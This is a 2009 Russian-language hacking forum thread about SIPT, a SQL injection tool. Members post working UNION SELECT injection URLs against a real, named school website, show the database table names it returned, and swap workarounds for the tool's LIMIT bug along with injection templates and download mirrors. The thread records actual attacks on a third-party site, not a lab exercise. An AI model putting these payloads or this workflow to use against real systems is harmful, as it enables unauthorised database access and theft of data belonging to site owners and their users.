31.05.2009, 20:24
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
С нами:
8941129
Репутация:
7
|
|
Рассмотрим на живом примере теперь.
http://www.tauntonschool.co.uk/foundation/index.php?id=-539'+union+select+1,2,GROUP_CONCAT(table_name),4+f rom+information_schema.tables+--+
Видим таблицы:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATIST ICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIG GERS,USER_PRIVILEGES,VIEWS,courier_news_files,cour ier_news_schools,events,events_images,file_categor ies,file_categories_dev,............
Теперь скормим программе:
Опять нашёл только одну таблицу. WTF??
Последний раз редактировалось farpost; 31.05.2009 в 20:34..
|
|
|
31.05.2009, 20:49
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
С нами:
8941129
Репутация:
7
|
|
Проблему нашёл:
SIPT делает два запроса:
Превый:
http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+1,1),0x7873716C696E6A656E64)+LIMIT+ 1,1--+
Результатом выполнения которого появляется 1я таблица (непонятно почему нулевая отбрасывается).
Во вотором запросе, LIMIT после ПОДзапроса должен увеличиться на 1 (то есть стать LIMIT+2,1). Но программа почему то увеличивает и LIMIT в конце всего запроса на 1.
В итоге получается такой запрос:
http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+2,1),0x7873716C696E6A656E64)+LIMIT+2,1--+
Который само собой ничего не выводит.
Второй запрос должен быть таким:
http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+2,1),0x7873716C696E6A656E64)+LIMIT+1,1--+
Это у меня сборка такая косячная или я чего то не догоняю???
_____________________________
И наконец то нашёл косяк в том что стоит галка AddLimit.
То что изменяется limit вконце помоему всё равно косяк большой. Хорошо бы поправить. Если не понятно, почему я считаю это косяком, могу разъяснить.
Последний раз редактировалось farpost; 31.05.2009 в 21:21..
|
|
|
|
01.06.2009, 13:55
|
|
Голос разума
Регистрация: 27.09.2006
Сообщений: 529
С нами:
10326626
Репутация:
1617
|
|
Сообщение от farpost
Проблему нашёл:
SIPT делает два запроса:
Во вотором запросе, LIMIT после ПОДзапроса должен увеличиться на 1 (то есть стать LIMIT+2,1). Но программа почему то увеличивает и LIMIT в конце всего запроса на 1.
Который само собой ничего не выводит.
Да это косяк сборки, я признаюсь косякнул, но перекомпилить не могу.
Чтобы обойти этот баг, надо просто к запросу добавить limit 0 в строке УРЛ и снять галку add limit
чтобы исходный запрос получился типа этого
SELECT * FROM users WHERE id=567 limit 0 union select 1,2,3...
например
.php?id=567+limit+0{SQLINJ}
тогда все будет прекрасно работать ибо это одно и тоже.
__________________
Бойтесь своих желаний. Они могут исполниться....
...О-о-о-о, ушами не услышать, глазами не понять!
Последний раз редактировалось SQLHACK; 01.06.2009 в 13:57..
|
|
|
|
02.06.2009, 01:20
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
С нами:
8941129
Репутация:
7
|
|
спасибо. тулза очень удобнаю. приноровился к её особенностям так сказать. юзаю...
Когда ищу колонки, в строек пишу так:
news.php?newsid=1+AND+1=1{SQLINJ}
Когда ищу таблицы и дамплю, просто делаю равенство неверным:
news.php?newsid=1+AND+1=2{SQLINJ}
Последний раз редактировалось farpost; 02.06.2009 в 11:03..
|
|
|
|
21.06.2009, 00:12
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Прога замечательная.Я заточил её под постгре и оракл)).Пара пожеланий:
1.Увеличить диапазоны перебираемых таблиц и полей из базы.После 30к записей вылетает с ошибкой.
2.Добавить комментарий --,а то каждый раз приписывать плюсики напрягает)))
3.Очень хотелось бы видеть поддержку для OracleSql,PostgreSql MsSql.Проходит ли работа в данном направлении. ?
4.Поддержка авторизации,ибо sql inj может быть недоступна при отсутствии авторизационных данных.Если такое уже сделали,то просветите,пожалуйста.(Ожи алось что-нибудь вроде полей username/password).
Автору,конечно же,пожелаю здоровья и тратить побольше времени для любимого сипти))).Если что найду - сразу же отпишусь.
|
|
|
|
21.06.2009, 20:10
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
С нами:
12513535
Репутация:
187
|
|
при sql-переборе post-методом, если нужно подставить дополнительные данные(а именно кукисы), то программа подставляет их неправильно, т.е. перед этими данными не ставится перенос строки, "\r\n", и весь запрос в пи*ду.
|
|
|
|
03.07.2009, 15:29
|
|
Новичок
Регистрация: 23.08.2007
Сообщений: 10
С нами:
9850742
Репутация:
0
|
|
Перезалейте кто нить, ссылка битая уже
|
|
|
|
03.07.2009, 15:42
|
|
Участник форума
Регистрация: 23.01.2008
Сообщений: 182
С нами:
9630451
Репутация:
410
|
|
Сообщение от Reason89
Перезалейте кто нить, ссылка битая уже
__http://rapidshare.com/files/251409152/sipt4.rar.html
вот залил..
|
|
|
|
06.07.2009, 02:00
|
|
Новичок
Регистрация: 10.01.2009
Сообщений: 6
С нами:
9122247
Репутация:
20
|
|
Перезалейте пжл. Не качает.
|
|
|
|
06.07.2009, 02:53
|
|
Познающий
Регистрация: 07.04.2009
Сообщений: 40
С нами:
8997763
Репутация:
103
|
|
http://depositfiles.com/files/60z5iznfr
http://ifolder.ru/12972726
http://www.rapidshare.ru/1091583
http://up-file.com/download/3124988aaddf01c5d297323012290458e
http://www.megaupload.com/?d=IYSP4AQ7
http://letitbit.net/download/1496.1253db6e726ba0fa7b35433f9/sipt4.rar.html
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
